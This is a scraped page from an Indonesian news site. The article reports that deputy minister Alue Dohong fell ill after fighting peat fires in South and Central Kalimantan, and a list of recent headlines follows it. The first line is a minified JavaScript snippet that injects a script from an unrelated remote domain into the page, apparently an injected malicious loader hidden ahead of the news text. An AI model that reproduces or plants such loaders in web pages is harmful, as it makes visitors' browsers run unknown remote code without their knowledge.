(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kalimantan Selatan

Wamen LHK ‘Tumbang’ Setelah Ikut Padamkan Karhutla di Kalsel


KANALKALIMANTAN.COM, BANJARBARU – Setelah turun langsung ke lapangan dan ikut berjibaku memadamkan kebakaran hutan dan lahan (Karhutla) di Kalimantan Selatan (Kalsel), Wakil Menteri Lingkungan Hidup dan Kehutanan (LHK) Alue Dohong mengalami sakit.

Kondisi kesehatan yang memburuk usai ikut memadamkan Karhutla itu diungkapkannya melalui akun Instagram pribadi Wamen LHK pada Rabu (4/10/2023) kemarin.

“Setelah sejak Jumat lalu sampai kemaren Selasa terlibat langsung dalam kegiatan pemadaman karhutla gambut di provinsi Kalimantan Tengah dan Kalimantan Selatan, akhirnya raga menjadi tepat dan ambruk juga guys,” tulis Alue Dohong dikutip dari akun Instagram.

Baca juga: Siswa SMA dan SMK ‘Dipaksa’ Kabut Asap Belajar Daring

Wamen LHK mengaku mengalami beberapa gejala seperti demam, kepala pusing sakit perut, dan batuk. Bahkan ia mengaku sempat memeriksa kesehatannya ke rumah sakit yang ada di Kota Banjarbaru.

“Dokter RSUD Syifa Medika Banjarbaru menyarankan bapak perlu istirahat dan dijaga kondisi paru-parunya, mungkin kebanyakan menghirup debu kebakaran gambut kali,” ujarnya.

Diketahui Wamen LHK Alue Dohong bersama Direktur Jenderal Planologi Kehutanan dan Tata Lingkungan (PKTL) Hanif Faisol Nurofik  datang melakukan kunjungan kerja ke Kalsel sejak Minggu (1/10/2023) lalu. Kunker dilakukan menyusul kian banyaknya terjadi Karhutla di Kalsel.

Wakil Menteri LHK Alue Dohong sakit usai ikut memadamkan kebakaran hutan dan lahan di Kalsel dan Kalteng. Foto: ist

Baca juga: Terdakwa Ketiga Korupsi Pengadaan iPad DPRD Banjarbaru Jalani Sidang

Sebelum itu ia juga melakukan kunjungan kerja dan ikut menangani Karhutla di Kalimantan Tengah.

Wamen LHK bersama pejabat Pemprov Kalsel bahkan sempat melaksanakan rapat di lokasi Karhutla kawasan ring 1 Guntung Damar, Landasan Ulin, Kota Banjarbaru.

Ia juga sempat turut langsung berjibaku memadamkan api di kawasan gambut Kalsel dan Kalteng.

Di Kalsel, Wamen LHK dan Dirjen Planologi Kehutanan dan Tata Lingkungan  memadamkan kebakaran lahan gambut di kawasan Guntung Damar dan Hutan Lindung Liang Anggang. Bahkan, pemadaman dilakukan hingga malam hari. (Kanalkalimantan.com/rizki)

Reporter : rizki
Editor : bie


Al Ghifari

Recent Posts

Lesti Kejora Hingga Ria Ricis Siap Ramaikan Silet Awards 2024!

KANALKALIMANTAN.COM, - Ajang penghargaan paling dramatis dan paling sensasional yang ditunggu masyarakat, Silet Awards 2024… Read More

26 menit ago

Kontes Motor 2Tak “Entwosiastrokes Volume 2 2024” di Banjarbaru, Ajang Adu Para Modifikator Banua

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin mengapreasiasi penyelenggaraan event kontes motor "Entwosiastrokes… Read More

1 jam ago

Kali Pertama Airbus A340 Layani Jemaah Haji Embarkasi Banjarmasin

Penerbangan Kloter 1 Sempat Terlambat 30 Menit Read More

5 jam ago

100 Peserta Ramaikan Kejuaraan Catur se Kalteng Piala Pj Bupati Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Kejuaraan catur piala Pj Bupati Kapuas se Kalimantan Tengah dibuka oleh… Read More

8 jam ago

Embarkasi Haji Banjarmasin Berangkatkan Kloter 1, 320 Jemaah Menuju Madinah

KANALKALIMANTAN.COM, BANJARBARU - Jemaah haji Kloter pertama diberangkatkan dari Asrama Haji Embarkasi Banjarmasin di Banjarbaru,… Read More

8 jam ago

Dilakban di Paha, Empat Orang di Bandara Juwata Tarakan Selundupkan 4 Kg Sabu

KANALKALIMANTAN.COM, TARAKAN - Empat orang calon penumpang pesawat dengan rute Tarakan-Makassar batal berangkat lantaran kedapatan… Read More

22 jam ago

This website uses cookies.